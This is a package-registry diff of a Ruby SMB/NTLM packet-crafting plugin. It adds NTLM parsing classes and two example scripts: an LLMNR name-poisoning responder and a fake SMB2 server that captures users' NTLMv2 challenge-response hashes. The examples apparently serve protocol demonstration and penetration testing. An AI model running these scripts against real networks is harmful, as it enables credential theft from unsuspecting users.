RubyGems - packetgen-plugin-smb - Versions diffs - 0.5.0 → 0.6.0 - Mend

packetgen-plugin-smb 0.5.0 → 0.6.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (22) hide show

checksums.yaml +4 -4
data/.travis.yml +3 -3
data/README.md +2 -1
data/examples/llmnr-responder +110 -0
data/examples/smb-responder +233 -0
data/lib/packetgen-plugin-smb.rb +1 -0
data/lib/packetgen/plugin/gssapi.rb +1 -1
data/lib/packetgen/plugin/ntlm.rb +211 -0
data/lib/packetgen/plugin/ntlm/authenticate.rb +197 -0
data/lib/packetgen/plugin/ntlm/av_pair.rb +117 -0
data/lib/packetgen/plugin/ntlm/challenge.rb +140 -0
data/lib/packetgen/plugin/ntlm/negotiate.rb +127 -0
data/lib/packetgen/plugin/ntlm/ntlmv2_response.rb +59 -0
data/lib/packetgen/plugin/smb/filetime.rb +6 -0
data/lib/packetgen/plugin/smb/negotiate/response.rb +1 -1
data/lib/packetgen/plugin/smb/string.rb +28 -3
data/lib/packetgen/plugin/smb2/negotiate/response.rb +5 -1
data/lib/packetgen/plugin/smb2/session_setup/request.rb +5 -1
data/lib/packetgen/plugin/smb2/session_setup/response.rb +5 -1
data/lib/packetgen/plugin/smb_version.rb +1 -1
data/packetgen-plugin-smb.gemspec +8 -3
metadata +17 -9

checksums.yaml CHANGED

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 7aaeb4b048754ed60fdb9f88a6d82dec247a993056617765e48e047d312d0962
-  data.tar.gz: 9c5da64aa7a58e9e7971554cdf435c08b085e2b63f81bacd9d36a19e9b610ac5
+  metadata.gz: 961af27daff2c38b17b266a4f9fd51d643e95b030cba835b3af596d18b93577e
+  data.tar.gz: 6792ca39dc088cbc36a32116b7a45e6b27f2a4bc95752f80262829b46e53701c
 SHA512:
-  metadata.gz: e261d4a050ed4a8ed34a51d106bacc519279256bc95bb75e0998947c6365bf008f4f7e43103b9f86b9526efafd0ee18e5cdb1f9f260fe94e052b309555552b50
-  data.tar.gz: 1c1e0fa328e1272a45ab699168b8cc246df7bf4520f4e2a82d2378ff89706e308dfbd57f50ecd1567800e905959a2672bce3756d1e1d6a59c8838198ae4dde92
+  metadata.gz: b03e45a4d17799b7fada7b096d901bd18b6692fe6afd6d90a563a8f6ae5338a6b82b8f71377f9e996ff73791291eb9b115fb901e50b5f6f114197374c4d3dcd8
+  data.tar.gz: 129ae737bfca356d136dc83e6d370a007458469add87eeddf2236827d6ff280d2ab18627b69e69a26608680bc15cf9a4bbcfba2c4ee4ef0f94f33d4ec19f2462

data/.travis.yml CHANGED

@@ -3,10 +3,10 @@ rvm:
   - 2.3
   - 2.4
   - 2.5
+  - 2.6
 install:
   - sudo apt-get update -qq
   - sudo apt-get install libpcap-dev -qq
-  - bundle install --path vendor/bundle --jobs=3 --retry=3
-script:
-  - bundle exec rake
+  - gem install bundler --version "~>1.17.3"
+  - bundle _1.17.3_ install --path vendor/bundle --jobs=3 --retry=3

data/README.md CHANGED

@@ -15,7 +15,8 @@ This is a plugin for [PacketGen gem](https://github.com/sdaubert/packetgen). It
     * SMB2 common header (support 2.x and 3.x dialects),
     * Negotiate command,
     * SessionSetup command,
-* GSSAPI, used to transport negotiation over SMB2 commands.
+* GSSAPI, used to transport negotiation over SMB2 commands,
+* NTLM, SMB authentication protocol.
 ## Installation

data/examples/llmnr-responder ADDED

@@ -0,0 +1,110 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a LLMNR responder. It responds to all LLMNR
+# requests on local network, and says requested name is its IP address.
+# frozen_string_literal: true
+require 'optparse'
+require 'socket'
+require 'ipaddr'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+class LlmnrResponder
+  attr_reader :socket, :my_ip, :my_ip_data
+  LLMNR_MCAST_ADDR = '224.0.0.252'
+  def initialize
+    @socket = UDPSocket.new
+  end
+  def start(bind_addr:, iface:)
+    @my_ip = Interfacez.ipv4_address_of(iface)
+    @my_ip_data = IPAddr.new(my_ip).hton
+    configure_multicast(my_ip_data)
+    socket.bind(bind_addr, PacketGen::Plugin::LLMNR::UDP_PORT)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[LLMNR] #{str}"
+  end
+  def configure_multicast(local_ip_bin)
+    mreq = IPAddr.new(LLMNR_MCAST_ADDR).hton + local_ip_bin
+    socket.setsockopt(:IPPROTO_IP, :IP_ADD_MEMBERSHIP, mreq)
+  end
+  def start_loop
+    loop do
+      data, peer = socket.recvfrom(1024)
+      pkt = PacketGen.parse(data, first_header: 'LLMNR')
+      next unless pkt.is?('LLMNR')
+      peer_port = peer[1]
+      peer_ip = peer[3]
+      log "received LLMNR request from #{peer_ip}"
+      # Forge LLMNR response
+      response_pkt = pkt.reply
+      response_pkt.llmnr.qr = true
+      response_pkt.llmnr.qd.each do |question|
+        next unless (question.human_rrclass == 'IN') && (question.human_type == 'A')
+        log "Say to #{peer_ip} #{question.name} is #{my_ip}"
+        answer = { rtype: 'RR', name: question.name, rdata: my_ip_data }
+        response_pkt.llmnr.an << answer
+      end
+      response_pkt.calc
+      next unless response_pkt.llmnr.ancount > 0
+      socket.send(response_pkt.to_s, 0, peer_ip, peer_port)
+    end
+  end
+end
+def parse_options
+  options = {}
+  OptionParser.new do |opts|
+    opts.banner = "Usage: #{$PROGRAM_NAME} [options]"
+    opts.separator ''
+    opts.separator 'Options:'
+    opts.on_tail('-h', '--help', 'Show this message') do
+      puts opts
+      exit
+    end
+    opts.on('-i IFACE', '--interface IFACE', 'interface on which responds') do |iface|
+      options[:iface] = iface
+    end
+  end.parse!
+  options
+end
+def check_options(options)
+  raise 'No interface given' if options[:iface].nil?
+  raise "unknown interface #{options[:iface]}" unless Interfacez.all.include? options[:iface]
+end
+options = parse_options
+check_options options
+LlmnrResponder.new.start(bind_addr: BIND_ADDR, iface: options[:iface])

data/examples/smb-responder ADDED

@@ -0,0 +1,233 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a SMB responder. It responds to all SMB
+# Negotiate request to capture credentials.
+# Before running it (as root), llmnr-responder should be running.
+# frozen_string_literal: true
+require 'socket'
+require 'securerandom'
+require 'ostruct'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+DOMAIN_NAME = 'SMB3'
+COMPUTER_NAME = 'WIN-AZE546CFHTD'
+Thread.abort_on_exception = true
+Credentials = Struct.new(:user, :computer, :challenge, :proof, :response, :ip) do
+  def to_s
+    user = self.user.encode('UTF-8')
+    computer = self.computer.encode('UTF-8')
+    str = +"User: #{user}\nComputer:#{computer} (IP: #{ip})\n"
+    str << "Challenge: #{challenge}\nProof: #{proof}\n"
+    str << "Response: #{response}"
+  end
+end
+class Smb2Responder
+  attr_reader :socket, :guid, :salt
+  NTLMSSP_OID = '1.3.6.1.4.1.311.2.2.10'
+  STATUS_MORE_PROCESSING_REQUIRED = 0xc0000016
+  STATUS_ACCESS_DENIED = 0xc0000022
+  SMB2_SIZE = 8_388_608
+  SMB2_NEGO_RESP_BUFFER = "`\x82\x01<\x06\x06+\x06\x01\x05\x05\x02\xA0\x82\x0100\x82\x01,\xA0\x1A0\x18\x06\n+\x06\x01\x04\x01\x827\x02\x02\x1E\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xA2\x82\x01\f\x04\x82\x01\bNEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\x7F\x15\x93\x15k\xE5\x88\n\x9A\\\x9A\xD6\x9EK`\x81\a\xEF\xF7f\xF6\x80\xAA\x17\xE0\xC2\xC5\xE5\xDB\x05\\\v\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\bNEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\b@\x00\x00\x00X\x00\x00\x000V\xA0T0R0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key"
+  SMB2_SALT_LEN = 32
+  def initialize
+    @guid = SecureRandom.uuid
+    @salt = SecureRandom.random_bytes(SMB2_SALT_LEN)
+  end
+  def start(bind_addr:)
+    @socket = TCPServer.new(bind_addr, PacketGen::Plugin::NetBIOS::Session::TCP_PORT2)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[SMB2] #{str}"
+  end
+  def get_smb_data(sock)
+    PacketGen.parse(sock.recv(1024), first_header: 'NetBIOS::Session')
+  end
+  def smb2_nego_resp1
+    return @resp1_pkt if defined? @resp1_pkt
+    @resp1_pkt = PacketGen.gen('NetBIOS::Session')
+                          .add('SMB2', credit: 1)
+                          .add('SMB2::Negotiate::Response',
+                               dialect: 0x2ff,
+                               server_guid: guid, capabilities: 7,
+                               max_trans_size: SMB2_SIZE,
+                               max_read_size: SMB2_SIZE,
+                               max_write_size: SMB2_SIZE)
+    @resp1_pkt.smb2_negotiate_response[:buffer] = PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER)
+    @resp1_pkt.calc
+    @resp1_pkt
+  end
+  def first_nego_response
+    pkt = smb2_nego_resp1
+    pkt.smb2_negotiate_response[:system_time] = PacketGen::Plugin::SMB::Filetime.now
+    pkt
+  end
+  def second_nego_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    nego_req = req_pkt.smb2_negotiate_request
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::Negotiate::Response',
+                        dialect: nego_req.dialects.last,
+                        server_guid: guid,
+                        capabilities: 0x2f,
+                        max_trans_size: SMB2_SIZE,
+                        max_read_size: SMB2_SIZE,
+                        max_write_size: SMB2_SIZE,
+                        system_time: PacketGen::Plugin::SMB::Filetime.now,
+                        buffer: PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER))
+    pkt.smb2_negotiate_response.context_list << { type: 1, salt_length: SMB2_SALT_LEN, salt: salt }
+    pkt.smb2_negotiate_response.context_list.last.hash_alg << PacketGen::Types::Int16le.new(1)
+    pkt.smb2_negotiate_response.context_list << { type: 2 }
+    pkt.smb2_negotiate_response.context_list.last.ciphers << PacketGen::Types::Int16le.new(1)
+    pkt.calc
+    pkt
+  end
+  def first_session_setup_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    setup_req = req_pkt.smb2_sessionsetup_request
+    ntlm_nego = PacketGen::Plugin::NTLM.read(setup_req.buffer[:token_init][:mech_token].value)
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit_charge: 1,
+                        credit: 1,
+                        status: STATUS_MORE_PROCESSING_REQUIRED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    ntlm = PacketGen::Plugin::NTLM::Challenge.new
+    ntlm.flags = ntlm_nego.flags | 0x00810000
+    ntlm.flags &= 0xfdffff15
+    ntlm.challenge = [rand(2**64)].pack('q<')
+    ntlm.target_name.read('SMB3')
+    ntlm.target_info << { type: 'DomainName', value: DOMAIN_NAME }
+    ntlm.target_info << { type: 'ComputerName', value: COMPUTER_NAME }
+    ntlm.target_info << { type: 'DnsDomainName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'DnsComputerName', value: "#{COMPUTER_NAME}.local" }
+    ntlm.target_info << { type: 'DnsTreeName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'Timestamp', value: PacketGen::Plugin::SMB::Filetime.now.to_human }
+    ntlm.target_info << { type: 'EOL' }
+    ntlm.calc_length
+    gssapi = pkt.smb2_sessionsetup_response.buffer
+    gssapi[:token_resp][:response].value = ntlm.to_s
+    gssapi[:token_resp][:negstate].value = 'accept-incomplete'
+    gssapi[:token_resp][:supported_mech] = NTLMSSP_OID
+    pkt.calc
+    [pkt, ntlm.challenge]
+  end
+  def deny_access(req_pkt)
+    smb2_req = req_pkt.smb2
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        credit_charge: 1,
+                        status: STATUS_ACCESS_DENIED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    # Remove buffer
+    pkt.smb2_sessionsetup_response[:buffer] = PacketGen::Types::String.new
+    pkt.calc
+    pkt
+  end
+  def start_loop
+    loop do
+      client = socket.accept
+      to_close = false
+      log "connection from #{client.peeraddr[2]}"
+      credentials = Credentials.new
+      credentials.ip = client.peeraddr.last
+      until to_close
+        rcv_pkt = get_smb_data(client)
+        pkt_to_send = case rcv_pkt.headers.last.protocol_name
+                      when 'SMB::Negotiate::Request'
+                        unless rcv_pkt.smb_negotiate_request.dialects.map(&:to_human).include?('SMB 2.???')
+                          to_close = true
+                          nil
+                        end
+                        first_nego_response
+                      when 'SMB2::Negotiate::Request'
+                        second_nego_response rcv_pkt
+                      when 'SMB2::SessionSetup::Request'
+                        gssapi = rcv_pkt.smb2_sessionsetup_request.buffer
+                        if gssapi[:token_init][:mech_types].value.map(&:value).include?(NTLMSSP_OID)
+                          pkt, challenge = first_session_setup_response(rcv_pkt)
+                          credentials.challenge = binary2hex(challenge)
+                          pkt
+                        else
+                          response = PacketGen::Plugin::NTLM.read(gssapi[:token_resp][:response].value)
+                          if response.is_a?(PacketGen::Plugin::NTLM::Authenticate)
+                            credentials.proof = binary2hex(response.nt_response.response)
+                            credentials.user = response.user_name
+                            credentials.computer = response.workstation
+                            credentials.response = binary2hex(response.nt_response.to_s[response.nt_response[:response].sz..-5])
+                            to_close = true
+                            deny_access rcv_pkt
+                          else
+                            to_close = true
+                            nil
+                          end
+                        end
+                      end
+        client.send(pkt_to_send.to_s, 0) if pkt_to_send
+        client.close if to_close
+        puts credentials.to_s unless credentials.response.nil?
+      end
+    end
+  end
+  def binary2hex(str)
+    str.unpack('H*').first
+  end
+end
+Smb2Responder.new.start(bind_addr: BIND_ADDR)

data/lib/packetgen-plugin-smb.rb CHANGED

@@ -12,3 +12,4 @@ require_relative 'packetgen/plugin/netbios'
 require_relative 'packetgen/plugin/smb'
 require_relative 'packetgen/plugin/smb2'
 require_relative 'packetgen/plugin/llmnr'
+require_relative 'packetgen/plugin/ntlm'

data/lib/packetgen/plugin/gssapi.rb CHANGED

@@ -101,7 +101,7 @@ module PacketGen::Plugin
                      model(:token_resp, NegTokenResp)]
     # @param [Hash] args
-    # @param [Symbol] :type +:init+ or +:response+ to force selection of
+    # @option args [Symbol] :token +:init+ or +:response+ to force selection of
     #  token CHOICE.
     def initialize(args={})
       token = args.delete(:token)

data/lib/packetgen/plugin/ntlm.rb ADDED

@@ -0,0 +1,211 @@
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+# frozen_string_literal: true
+module PacketGen::Plugin
+  # Base class for NTLM authentication protocol.
+  # @author Sylvain Daubert
+  class NTLM < PacketGen::Types::Fields
+    # NTLM message types
+    TYPES = {
+      'negotiate' => 1,
+      'challenge' => 2,
+      'authenticate' => 3
+    }.freeze
+    # NTLM signature
+    SIGNATURE = "NTLMSSP\0"
+    # void version
+    VOID_VERSION = [0].pack('q').freeze
+    VOID_CHALLENGE = VOID_VERSION
+    # @!attribute signature
+    #  8-byte NTLM signature
+    #  @return [String]
+    define_field :signature, PacketGen::Types::String, static_length: 8, default: SIGNATURE
+    # @!attribute type
+    #  4-byte message type
+    #  @return [Integer]
+    define_field :type, PacketGen::Types::Int32leEnum, enum: TYPES
+    # @!attribute payload
+    #  @return [String]
+    define_field :payload, PacketGen::Types::String
+    class <<self
+      # @api private
+      # Return fields defined in payload one.
+      # @return [Hash]
+      attr_accessor :payload_fields
+      # Create a NTLM object from a binary string
+      # @param [String] str
+      # @return [NTLM]
+      def read(str)
+        ntlm = self.new.read(str)
+        type = TYPES.key(ntlm.type)
+        return ntlm if type.nil?
+        klass = NTLM.const_get(type.capitalize)
+        klass.new.read(str)
+      end
+      # Define a flags field.
+      # @return [void]
+      def define_negotiate_flags
+        define_field_before :payload, :flags, PacketGen::Types::Int32le
+        define_bit_fields_on :flags, :flags_w, :flags_v, :flags_u, :flags_r13, 3,
+                             :flags_t, :flags_r4, :flags_s, :flags_r,
+                             :flags_r5, :flags_q, :flags_p, :flags_r6,
+                             :flags_o, :flags_n, :flags_m, :flags_r7,
+                             :flags_l, :flags_k, :flags_j, :flags_r8,
+                             :flags_h, :flags_r9, :flags_g, :flags_f,
+                             :flags_e, :flags_d, :flags_r10, :flags_c,
+                             :flags_b, :flags_a
+        alias_method :nego56?, :flags_w?
+        alias_method :key_exch?, :flags_v?
+        alias_method :nego128?, :flags_u?
+        alias_method :version?, :flags_t?
+        alias_method :target_info?, :flags_s?
+        alias_method :non_nt_session_key?, :flags_r?
+        alias_method :identify?, :flags_q?
+        alias_method :ext_session_security?, :flags_p?
+        alias_method :target_type_server?, :flags_o?
+        alias_method :target_type_domain?, :flags_n?
+        alias_method :always_sign?, :flags_m?
+        alias_method :oem_workstation_supplied?, :flags_l?
+        alias_method :oem_domain_supplied?, :flags_k?
+        alias_method :anonymous?, :flags_j?
+        alias_method :ntlm?, :flags_h?
+        alias_method :lm_key?, :flags_g?
+        alias_method :datagram?, :flags_f?
+        alias_method :seal?, :flags_e?
+        alias_method :sign?, :flags_d?
+        alias_method :request_target?, :flags_c?
+        alias_method :oem?, :flags_b?
+        alias_method :unicode?, :flags_a?
+        alias_method :old_flags_a=, :flags_a=
+        alias_method :old_flags=, :flags=
+        class_eval do
+          def flags_a=(value)
+            self.old_flags_a = value
+            self.class.payload_fields.each do |name, _|
+              attr = send(name)
+              attr.unicode = value if attr.respond_to?(:unicode=)
+            end
+            value
+          end
+          def flags=(value)
+            self.old_flags = value
+            self.flags_a = value & 1
+          end
+        end
+      end
+      # Define a field in payload. Also add +name_len+, +name_maxlen+ and
+      # +name_offset+ fields.
+      # @param [Symbol] name name of field.
+      # @param [Class,nil] type type of +name+ field.
+      # @param [Hash] options type's options needed at build time
+      # @return [void]
+      def define_in_payload(name, type=SMB::String, options={})
+        @payload_fields ||= {}
+        @payload_fields[name] = [type, options]
+        define_field_before :payload, :"#{name}_len", PacketGen::Types::Int16le
+        define_field_before :payload, :"#{name}_maxlen", PacketGen::Types::Int16le
+        define_field_before :payload, :"#{name}_offset", PacketGen::Types::Int32le
+        attr_accessor name
+      end
+    end
+    # @abstract This method is meaningful for {NTLM} subclasses only.
+    def initialize(options={})
+      super
+      return if self.class.payload_fields.nil?
+      self.class.payload_fields.each do |name, type_and_opt|
+        type, options = type_and_opt
+        content = if type.new.respond_to?(:unicode?)
+                    type.new(options.merge(unicode: unicode?))
+                  else
+                    type.new(options)
+                  end
+        send(:"#{name}=", content)
+      end
+    end
+    # @abstract This class is meaningful for {NTLM} subclasses only.
+    # Populate object from a binary string
+    # @param [String] str
+    # @return [self]
+    def read(str)
+      super
+      return self if self.class.payload_fields.nil?
+      self.class.payload_fields.each do |name, type_and_opt|
+        type, options = type_and_opt
+        offset_in_payload = send(:"#{name}_offset") - offset_of(:payload)
+        length = send(:"#{name}_len")
+        content = if type.new.respond_to?(:unicode?)
+                    type.new(options.merge(unicode: unicode?))
+                  else
+                    type.new(options)
+                  end
+        content.read(payload[offset_in_payload, length]) if length > 0
+        send(:"#{name}=", content)
+      end
+      self
+    end
+    # @abstract This class is meaningful for {NTLM} subclasses only.
+    # Calculate and set +len+, +maxlen+ and +offset+ fields defined for
+    # fields in {#payload}.
+    # @return [void]
+    def calc_length
+      return self if self.class.payload_fields.nil?
+      previous_len = 0
+      self.class.payload_fields.each do |name, _type_and_opt|
+        send(:"#{name}_len=", 0)
+        send(:"#{name}_offset=", offset_of(:payload) + previous_len)
+        field = send(name)
+        next unless field && !field.empty?
+        length = field.respond_to?(:sz) ? field.sz : field.size
+        send(:"#{name}_len=", length)
+        send(:"#{name}_maxlen=", length)
+        previous_len = length
+      end
+    end
+    # @abstract This class is meaningful for {NTLM} subclasses only.
+    # @return [String]
+    def to_s
+      s = super
+      return s if self.class.payload_fields.nil?
+      self.class.payload_fields.each do |name, _type_and_opt|
+        attr = send(name)
+        attr.unicode = unicode? if attr.respond_to?(:unicode=)
+        s << attr.to_s unless attr.nil? || send("#{name}_len").zero?
+      end
+      s
+    end
+  end
+end
+require_relative 'ntlm/av_pair'
+require_relative 'ntlm/ntlmv2_response'
+require_relative 'ntlm/negotiate'
+require_relative 'ntlm/challenge'
+require_relative 'ntlm/authenticate'